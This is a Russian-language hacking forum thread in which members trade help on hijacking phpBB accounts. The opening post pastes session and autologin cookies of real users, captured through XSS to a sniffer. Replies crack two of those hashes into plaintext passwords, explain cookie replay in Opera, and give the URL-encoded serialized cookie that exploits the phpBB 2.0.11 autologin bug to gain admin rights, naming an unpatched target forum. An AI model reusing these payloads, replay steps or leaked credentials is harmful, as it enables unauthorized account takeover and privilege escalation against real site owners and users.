Как подменить куки на PhpBB?

Discussion in 'Песочница' started by podkashey, 14 Jan 2006.

  1. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    В поиске по форуму почему-то не нашел. Извиняюсь если уже было.
    По PhpBB 2.0.14 вроде. Использовал XSS WJ.
    На сниффер приходят такого вида кукисы:

    1) REFERER=http://сайт.ru/viewtopic.php?t=144
    QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:2:"71";}; phpbb2mysql_sid=fb92f3ae9449faa5f5638a7b8f82665c; b=b; phpbb2mysql_t=a:1:{i:144;i:1137188123;}
    AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)

    2) REFERER=http://сайт/viewtopic.php?p=1000&sid=7f719a7904ea3855d0e19651ea5dffb5
    QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c3b1cdacd926a27c6d2ba4edea2315d9";s:6:"userid";i:4;}; phpbb2mysql_sid=7f719a7904ea3855d0e19651ea5dffb5; b=b; phpbb2mysql_t=a:1:{i:144;i:1137187244;}

    3) QUERY=mail=к; comlog=Arsenio; b=b; hotlog=1; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c38fc265ba6bd19e91716b07459e0840";s:6:"userid";i:88;}; phpbb2mysql_sid=12e1027040bd3158d7f8ef8d63cab91d; b=b; phpbb2mysql_t=a:1:{i:136;i:1137186727;}

    и только один раз вот такое:
    4)REFERER=http://сайт.ru/viewtopic.php?t=99&postdays=0&postorder=asc&start=180&sid=3c0662d34eb3e23da30b84d19347d2ec
    QUERY=; sessionid=2038548; b=b; hotlog=1; phpbb2mysql_data=a:0:{}; phpbb2mysql_sid=3c0662d34eb3e23da30b84d19347d2ec; b=b

    Че-то не понимаю что с ними делать - свои когда заменяю ничего не происходит. Почему только в одном месте есть сессион хэш? Или надо расшифровывать обязательно? Тогда что конкретно расшифровывать? Нет ли там соли как в ИПБ?

    Заранее спасибо. С меня репа.
     
  2. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    Соли нету !!!
    Зпходи в Опере в куки у удоляй все кроме :phpbb2mysql_data и phpbb2mysql_sid и подстовляй свое и все !!!
     
  3. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    и еще одно если не зайдет то тогда phpbb2mysql_data:вот точто здесь должно быть биг к кокомуто декодуру и кодируй в URL и встовляй !!!
     
  4. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    2) REFERER=http://сайт/viewtopic.php?p=1000&sid=7f719a7904ea3855d0e19651ea5dffb5
    QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c3b1cdacd926a27c6d2ba4edea2315d9";s:6:"userid";i:4;}; phpbb2mysql_sid=7f719a7904ea3855d0e19651ea5dffb5; b=b; phpbb2mysql_t=a:1:{i:144;i:1137187244;}
    Иль просто расшифруй хешь c3b1cdacd926a27c6d2ba4edea2315d9 вот я те расшифровал пароль этого хеша babitch
     
  5. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    c38fc265ba6bd19e91716b07459e0840:loko
     
  6. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Не понимаю в чем дело, но сую в оперу куки, а зайти все равно не получается. Хотя пароль расшифрованный один подошел. ;)
    Еще интересен такой момент: Там где пароль loko, стоит юзер айди 88 (если я правильно понимаю), а такого юзера нету (опять же смотрел через ссылку из списка пользователей u=88). Такое возможно? И как так быстро нашелся пароль babitch - он в словарях есть или так быстро перебирается? Через http://passcrack.spb.ru искали?
    Есть ли на PhpBB 2.0.14 проблемы со входом в админку как на IPB (одного хэша мало)?
    P.S. Всем спасибо и плюсы к репе. ;)
     
  7. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    По поводу 88 извиняюсь - ступил - не тот форум смотрел. ;)
    Ну и еще хотелось бы узнать почему то пхп_дата, то в одном месте появляется сессионхэш?
     
  8. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    вощето если у юзака не стоит опция автологин то бужешь токо сессию ловить в снифере.
     
  9. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Имелост в виду:
    QUERY=; sessionid=2038548; b=b; hotlog=1; phpbb2mysql_data=a:0:{}; phpbb2mysql_sid=3c0662d34eb3e23da30b84d19347d2ec; b=b
    а конкретнее sessionhash. Что это?
     
  10. Grom

    Grom New Member

    Joined:
    3 Sep 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Вопрос, мона, не нашел топа с темой.
    Помните баг phpbb с куками. Нашел версию 2.0.11 пытаюсь в Опере подставлять куку a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D, ни черта не получается, так и остаюсь со своими правами. Вот линк, если кто могет помочь http://forum.homebusiness.ru/
     
  11. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    Возможно форум пропатчен..потому и не работает.
     
  12. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    а как же ты хочешь войти, если юзер не использует автологин? жди когда он появится на форуме, лови куки и заходи вместе с ним или пока куки живы. еще эдак час +/- А вообще это странно входить на 2.0.11 и скакой-то подставой кук париться. иди сразу в админку. тут на ачате вроде есть всё. найди
     
  13. Grom

    Grom New Member

    Joined:
    3 Sep 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    syntacsis Не нашел как можно на 11-ой версии сразу в админку залезть, кроме как XSS (украсть куку и сессию). Если знаешь, могешь в личку намек бросить или линк на топ где это обсуждалось? Заранее благодарен!
    Grrl Не пропатчен, админа я знаю, он лентяй и багтраки не смотрит.
     
  14. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    дай полные куки что пришли на сниффер, скажу что и куда вставить
     
  15. Grom

    Grom New Member

    Joined:
    3 Sep 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    WizART Дык с куками я вродь как знаю, что и куда вставлять (в phpmysql_data и саму сессию ставил в phpmysql_id и в Опере и в Мозилле). Вопрос вот в чем: почему не патченный форум на 11- ом движке не пускает меня с этой сессией и кукой в админку и даже просто, судя по видео от KEZ у меня не получается получить админские права. Гы-ы... Руки то у меня конечно не супер прямые, но и не кривые тож, а вот в чем трабл, не пойму... Кстать, а могет быть, что ID админа не %222%22%, а допустим %225%22?
     
  16. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    вообще-то и не обязательно что ID админа 2!!! :))) это для примера дано ЛОООЛ :) Смотришь ID админа и фтыкаешь замест 2 и все, например "%22235%22"
     
  17. Grom

    Grom New Member

    Joined:
    3 Sep 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    WizArtНе нихрена, ни в админку не заходит, ни права админские не получаю (куку ставлю админскую), сцука, неужель он все таки пропатчил форум. А кстати, там трабл такой, что даже када галку ставишь "Запомнить меня", он все равно не запоминает...
     
  18. _lolik_

    _lolik_ Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    85
    Likes Received:
    3
    Reputations:
    1
    это не пропатченый форум, а глючный :) В некоторых версия пхпББ был такой прикол, у меня сначала вообще не хотело входить, просто страницу с ошибкой давало, но потом пофиксил этот баг.

    Вопрос чем опера от експлорера отличается в плоне куки, просто я еще не вникал в это. Хочется что б разьяснили
     
  19. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    238
    Reputations:
    182
    Перед тем как куки менять их вроде надо перекодировать :)
     
  20. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    =\ там вощето уже закодированные, блин читай тему про баги пхпББ это типо в куки ставишь, в одно место замест своего ID втыкаешь админовский и уаля :) ты админ :)))
    Кст ты с autologin входил под своим юзером?